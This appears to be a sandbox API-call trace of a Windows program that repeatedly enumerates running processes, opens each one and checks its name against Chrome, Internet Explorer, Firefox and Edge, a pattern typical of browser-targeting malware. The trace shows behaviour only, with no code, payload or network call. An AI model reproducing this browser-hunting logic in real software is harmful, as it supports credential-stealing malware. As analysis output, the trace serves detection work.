	[0254.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.774] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0254.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.774] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.775] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0254.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.775] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xad54
	[0254.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.776] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.777] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.777] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.777] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.777] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xad58
	[0254.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.778] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.779] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xad5c
	[0254.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.781] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0254.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.781] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.782] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0254.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.782] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xad60
	[0254.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.783] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.783] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.784] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.784] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xad64
	[0254.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.785] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0254.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.785] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.786] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0254.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.786] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.786] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xad68
	[0254.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.787] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.787] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.788] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.788] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0254.789] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xad6c
	[0254.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.789] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0254.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.789] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.790] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0254.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.790] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0254.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xad70
	[0254.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.791] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.791] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.792] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.792] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.792] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0254.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xad74
	[0254.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.793] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0254.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.793] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.794] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0254.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.794] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0254.795] CloseHandle (hObject=0x4fd0) returned 1
	[0254.795] Sleep (dwMilliseconds=0x64) 
	[0254.923] GetCurrentProcessId () returned 0x110
	[0254.923] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0254.925] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0254.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0254.927] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0254.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xad78
	[0254.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.928] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.928] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.928] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.929] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xad7c
	[0254.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.930] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.930] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.930] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.931] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.931] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0254.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xad80
	[0254.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.932] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0254.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.932] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.933] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0254.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.933] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.933] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xad84
	[0254.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.934] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.934] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.935] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.935] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0254.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xad88
	[0254.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.936] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0254.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.937] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.937] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0254.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.938] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.938] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0254.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xad8c
	[0254.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.939] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0254.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.939] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.940] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0254.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.940] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0254.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xad90
	[0254.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.941] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0254.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.941] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.942] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0254.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.942] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.942] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0254.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xad94
	[0254.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.944] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.944] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.944] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.945] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.945] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xad98
	[0254.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.946] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.946] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.947] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.947] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.947] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xad9c
	[0254.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.948] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.948] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.949] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.949] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xada0
	[0254.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.950] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.951] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.951] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.952] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.952] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xada4
	[0254.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.953] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.954] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.954] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xada8
	[0254.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.956] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.956] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.957] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.957] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.957] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xadac
	[0254.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.958] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.959] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.959] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.959] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xadb0
